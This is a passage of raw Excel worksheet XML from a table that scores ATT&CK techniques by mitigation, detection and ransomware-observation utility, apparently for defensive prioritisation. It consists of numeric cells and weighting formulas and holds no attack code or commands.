      </c>
      <c r="L169" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M169" s="37">
        <v>0</v>
      </c>
      <c r="N169" s="56">
        <v>0</v>
      </c>
      <c r="O169" s="56">
        <v>2</v>
      </c>
      <c r="P169" s="56">
        <v>1</v>
      </c>
      <c r="Q169" s="56">
        <v>0</v>
      </c>
      <c r="R169" s="57" t="s">
        <v>609</v>
      </c>
      <c r="S169" s="57">
        <v>4</v>
      </c>
      <c r="T169" s="57" t="s">
        <v>610</v>
      </c>
      <c r="U169" s="57">
        <v>8</v>
      </c>
      <c r="V169" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.1285715238095238</v>
      </c>
      <c r="W169" s="37">
        <v>12</v>
      </c>
      <c r="X169" s="37">
        <v>0.21818199999999999</v>
      </c>
      <c r="Y169" s="37">
        <v>0.21818199999999999</v>
      </c>
      <c r="Z169" s="37">
        <v>3</v>
      </c>
      <c r="AA169" s="37">
        <v>0.03</v>
      </c>
      <c r="AB169" s="37">
        <v>0.03</v>
      </c>
      <c r="AC169" s="37"/>
      <c r="AD169" s="50" t="s">
        <v>602</v>
      </c>
      <c r="AE169" s="37" t="str" cm="1">
        <f t="array" ref="AE169">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD169)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF169" s="37">
        <v>165</v>
      </c>
      <c r="AG169" s="37" t="str" cm="1">
        <f t="array" ref="AG169">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD169)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH169" s="37">
        <v>165</v>
      </c>
      <c r="AI169" s="37" t="str" cm="1">
        <f t="array" ref="AI169">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD169)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ169" s="37">
        <v>165</v>
      </c>
      <c r="AK169" s="37" t="str" cm="1">
        <f t="array" ref="AK169">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD169)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL169" s="37">
        <v>165</v>
      </c>
      <c r="AM169" s="37" t="str" cm="1">
        <f t="array" ref="AM169">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD169)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN169" s="37">
        <v>0</v>
      </c>
      <c r="AO169" s="37">
        <v>1</v>
      </c>
      <c r="AP169" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ169" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>50.361925746031744</v>
      </c>
      <c r="AR169" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS169" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT169" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU16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1.2229029939531366</v>
      </c>
    </row>
    <row r="170" spans="1:47" ht="17">
      <c r="A170" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B170" s="37">
        <f t="shared" si="2"/>
        <v>72.833396666666673</v>
      </c>
      <c r="C170" s="37" t="s">
        <v>611</v>
      </c>
      <c r="D170" s="50" t="s">
        <v>599</v>
      </c>
      <c r="E170" s="37" t="s">
        <v>612</v>
      </c>
      <c r="F170" s="37">
        <v>1</v>
      </c>
      <c r="G170" s="37">
        <v>1</v>
      </c>
      <c r="H170" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I170" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J170" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K170" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L170" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M170" s="37">
        <v>0</v>
      </c>
      <c r="N170" s="56">
        <v>0</v>
      </c>
      <c r="O170" s="56">
        <v>0</v>
      </c>
      <c r="P170" s="56">
        <v>0</v>
      </c>
      <c r="Q170" s="56">
        <v>0</v>
      </c>
      <c r="R170" s="57"/>
      <c r="S170" s="57">
        <v>0</v>
      </c>
      <c r="T170" s="57" t="s">
        <v>613</v>
      </c>
      <c r="U170" s="57">
        <v>1</v>
      </c>
      <c r="V170" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>9.5239047619047629E-3</v>
      </c>
      <c r="W170" s="37">
        <v>1</v>
      </c>
      <c r="X170" s="37">
        <v>1.8182E-2</v>
      </c>
      <c r="Y170" s="37">
        <v>1.8182E-2</v>
      </c>
      <c r="Z170" s="37">
        <v>0</v>
      </c>
      <c r="AA170" s="37">
        <v>0</v>
      </c>
      <c r="AB170" s="37">
        <v>0</v>
      </c>
      <c r="AC170" s="37"/>
      <c r="AD170" s="50" t="s">
        <v>75</v>
      </c>
      <c r="AE170" s="37" t="str" cm="1">
        <f t="array" ref="AE170">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD170)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF170" s="37">
        <v>166</v>
      </c>
      <c r="AG170" s="37" t="str" cm="1">
        <f t="array" ref="AG170">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD170)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH170" s="37">
        <v>166</v>
      </c>
      <c r="AI170" s="37" t="str" cm="1">
        <f t="array" ref="AI170">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD170)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ170" s="37">
        <v>166</v>
      </c>
      <c r="AK170" s="37" t="str" cm="1">
        <f t="array" ref="AK170">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD170)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL170" s="37">
        <v>166</v>
      </c>
      <c r="AM170" s="37" t="str" cm="1">
        <f t="array" ref="AM170">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD170)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN170" s="37">
        <v>0</v>
      </c>
      <c r="AO170" s="37">
        <v>0</v>
      </c>
      <c r="AP170" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ170" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>24.277798888888892</v>
      </c>
      <c r="AR170" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS170" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT170" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU17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71" spans="1:47" ht="34">
      <c r="A171" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B171" s="37">
        <f t="shared" si="2"/>
        <v>306.65000785714284</v>
      </c>
      <c r="C171" s="37" t="s">
        <v>614</v>
      </c>
      <c r="D171" s="50" t="s">
        <v>615</v>
      </c>
      <c r="E171" s="37"/>
      <c r="F171" s="37">
        <v>1</v>
      </c>
      <c r="G171" s="37">
        <v>1</v>
      </c>
      <c r="H171" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I171" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J171" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K171" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L171" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M171" s="37">
        <v>0.19170400000000001</v>
      </c>
      <c r="N171" s="56">
        <v>0</v>
      </c>
      <c r="O171" s="56">
        <v>1</v>
      </c>
      <c r="P171" s="56">
        <v>0</v>
      </c>
      <c r="Q171" s="56">
        <v>0</v>
      </c>
      <c r="R171" s="57" t="s">
        <v>616</v>
      </c>
      <c r="S171" s="57">
        <v>7</v>
      </c>
      <c r="T171" s="57" t="s">
        <v>617</v>
      </c>
      <c r="U171" s="57">
        <v>10</v>
      </c>
      <c r="V171" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.16666671428571431</v>
      </c>
      <c r="W171" s="37">
        <v>17</v>
      </c>
      <c r="X171" s="37">
        <v>0.309091</v>
      </c>
      <c r="Y171" s="37">
        <v>0.309091</v>
      </c>
      <c r="Z171" s="37">
        <v>1</v>
      </c>
      <c r="AA171" s="37">
        <v>0.01</v>
      </c>
      <c r="AB171" s="37">
        <v>0.01</v>
      </c>
      <c r="AC171" s="37"/>
      <c r="AD171" s="50" t="s">
        <v>618</v>
      </c>
      <c r="AE171" s="37" t="str" cm="1">
        <f t="array" ref="AE171">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD171)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF171" s="37">
        <v>167</v>
      </c>
      <c r="AG171" s="37" t="str" cm="1">
        <f t="array" ref="AG171">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD171)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH171" s="37">
        <v>167</v>
      </c>
      <c r="AI171" s="37" t="str" cm="1">
        <f t="array" ref="AI171">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD171)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ171" s="37">
        <v>167</v>
      </c>
      <c r="AK171" s="37" t="str" cm="1">
        <f t="array" ref="AK171">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD171)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL171" s="37">
        <v>167</v>
      </c>
      <c r="AM171" s="37" t="str" cm="1">
        <f t="array" ref="AM171">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD171)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AN171" s="37">
        <v>0</v>
      </c>
      <c r="AO171" s="37">
        <v>1</v>
      </c>
      <c r="AP171" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ171" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>102.21666928571427</v>
      </c>
      <c r="AR171" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS171" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT171" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU17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2.4575397448979586</v>
      </c>
    </row>
    <row r="172" spans="1:47" ht="34">
      <c r="A172" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B172" s="37">
        <f t="shared" si="2"/>
        <v>163.44276100000002</v>
      </c>
      <c r="C172" s="37" t="s">
        <v>619</v>
      </c>
      <c r="D172" s="50" t="s">
        <v>620</v>
      </c>
      <c r="E172" s="37"/>
      <c r="F172" s="37">
        <v>1</v>
      </c>
      <c r="G172" s="37">
        <v>1</v>
      </c>
      <c r="H172" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I172" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J172" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K172" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L172" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M172" s="37">
        <v>0</v>
      </c>
      <c r="N172" s="56">
        <v>0</v>
      </c>
      <c r="O172" s="56">
        <v>0</v>
      </c>
      <c r="P172" s="56">
        <v>0</v>
      </c>
      <c r="Q172" s="56">
        <v>0</v>
      </c>
      <c r="R172" s="57" t="s">
        <v>621</v>
      </c>
      <c r="S172" s="57">
        <v>7</v>
      </c>
      <c r="T172" s="57" t="s">
        <v>622</v>
      </c>
      <c r="U172" s="57">
        <v>8</v>
      </c>
      <c r="V172" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.14285700000000001</v>
      </c>
      <c r="W172" s="37">
        <v>15</v>
      </c>
      <c r="X172" s="37">
        <v>0.272727</v>
      </c>
      <c r="Y172" s="37">
        <v>0.272727</v>
      </c>
      <c r="Z172" s="37">
        <v>0</v>
      </c>
      <c r="AA172" s="37">
        <v>0</v>
      </c>
      <c r="AB172" s="37">
        <v>0</v>
      </c>
      <c r="AC172" s="37"/>
      <c r="AD172" s="50" t="s">
        <v>623</v>
      </c>
      <c r="AE172" s="37" t="str" cm="1">
        <f t="array" ref="AE172">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD172)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF172" s="37">
        <v>168</v>
      </c>
      <c r="AG172" s="37" t="str" cm="1">
        <f t="array" ref="AG172">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD172)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH172" s="37">
        <v>168</v>
      </c>
      <c r="AI172" s="37" t="str" cm="1">
        <f t="array" ref="AI172">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD172)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ172" s="37">
        <v>168</v>
      </c>
      <c r="AK172" s="37" t="str" cm="1">
        <f t="array" ref="AK172">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD172)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL172" s="37">
        <v>168</v>
      </c>
      <c r="AM172" s="37" t="str" cm="1">
        <f t="array" ref="AM172">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD172)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AN172" s="37">
        <v>0</v>
      </c>
      <c r="AO172" s="37">
        <v>0</v>
      </c>
      <c r="AP172" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ172" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>54.480920333333337</v>
      </c>
      <c r="AR172" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS172" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT172" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU17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73" spans="1:47" ht="34">
      <c r="A173" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.4</v>
      </c>
      <c r="B173" s="37">
        <f t="shared" si="2"/>
        <v>955.85965276190473</v>
      </c>
      <c r="C173" s="37" t="s">
        <v>624</v>
      </c>
      <c r="D173" s="50" t="s">
        <v>625</v>
      </c>
      <c r="E173" s="37"/>
      <c r="F173" s="37">
        <v>2</v>
      </c>
      <c r="G173" s="37">
        <v>1</v>
      </c>
      <c r="H173" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.15000000000000002</v>
      </c>
      <c r="I173" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.2</v>
      </c>
      <c r="J173" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="K173" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L173" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M173" s="37">
        <v>1</v>
      </c>
      <c r="N173" s="56">
        <v>0</v>
      </c>
      <c r="O173" s="56">
        <v>4</v>
      </c>
      <c r="P173" s="56">
        <v>1</v>
      </c>
      <c r="Q173" s="56">
        <v>2</v>
      </c>
      <c r="R173" s="57" t="s">
        <v>626</v>
      </c>
      <c r="S173" s="57">
        <v>13</v>
      </c>
      <c r="T173" s="57" t="s">
        <v>627</v>
      </c>
      <c r="U173" s="57">
        <v>11</v>
      </c>
      <c r="V173" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.2619049523809524</v>
      </c>
      <c r="W173" s="37">
        <v>24</v>
      </c>
      <c r="X173" s="37">
        <v>0.43636399999999997</v>
      </c>
      <c r="Y173" s="37">
        <v>0.43636399999999997</v>
      </c>
      <c r="Z173" s="37">
        <v>7</v>
      </c>
      <c r="AA173" s="37">
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AB173" s="37">
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AC173" s="37"/>
      <c r="AD173" s="50" t="s">
        <v>526</v>
      </c>
      <c r="AE173" s="37" t="str" cm="1">
        <f t="array" ref="AE173">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD173)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF173" s="37">
        <v>169</v>
      </c>
      <c r="AG173" s="37" t="str" cm="1">
        <f t="array" ref="AG173">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD173)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH173" s="37">
        <v>169</v>
      </c>
      <c r="AI173" s="37" t="str" cm="1">
        <f t="array" ref="AI173">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD173)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ173" s="37">
        <v>169</v>
      </c>
      <c r="AK173" s="37" t="str" cm="1">
        <f t="array" ref="AK173">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD173)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL173" s="37">
        <v>169</v>
      </c>
      <c r="AM173" s="37" t="str" cm="1">
        <f t="array" ref="AM173">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD173)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN173" s="37">
        <v>0</v>
      </c>
      <c r="AO173" s="37">
        <v>3</v>
      </c>
      <c r="AP173" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.4</v>
      </c>
      <c r="AQ173" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>318.61988425396822</v>
      </c>
      <c r="AR173" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS173" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AT173" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AU17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22.829991732426301</v>
      </c>
    </row>
    <row r="174" spans="1:47" ht="85">
      <c r="A174" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B174" s="37">
        <f t="shared" si="2"/>
        <v>507.74831414285705</v>
      </c>
      <c r="C174" s="37" t="s">
        <v>628</v>
      </c>
      <c r="D174" s="50" t="s">
        <v>629</v>
      </c>
      <c r="E174" s="37"/>
      <c r="F174" s="37">
        <v>1</v>
      </c>
      <c r="G174" s="37">
        <v>1</v>
      </c>
      <c r="H174" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I174" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J174" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K174" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L174" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M174" s="37">
        <v>7.4970000000000002E-3</v>
      </c>
      <c r="N174" s="56">
        <v>1</v>
      </c>
      <c r="O174" s="56">
        <v>22</v>
      </c>
      <c r="P174" s="56">
        <v>35</v>
      </c>
      <c r="Q174" s="56">
        <v>10</v>
      </c>
      <c r="R174" s="57" t="s">
        <v>630</v>
      </c>
      <c r="S174" s="57">
        <v>21</v>
      </c>
      <c r="T174" s="57" t="s">
        <v>631</v>
      </c>
      <c r="U174" s="57">
        <v>12</v>
      </c>
      <c r="V174" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.63809523809523805</v>
      </c>
      <c r="W174" s="37">
        <v>33</v>
      </c>
      <c r="X174" s="37">
        <v>0.6</v>
      </c>
      <c r="Y174" s="37">
        <v>0.6</v>
      </c>
      <c r="Z174" s="37">
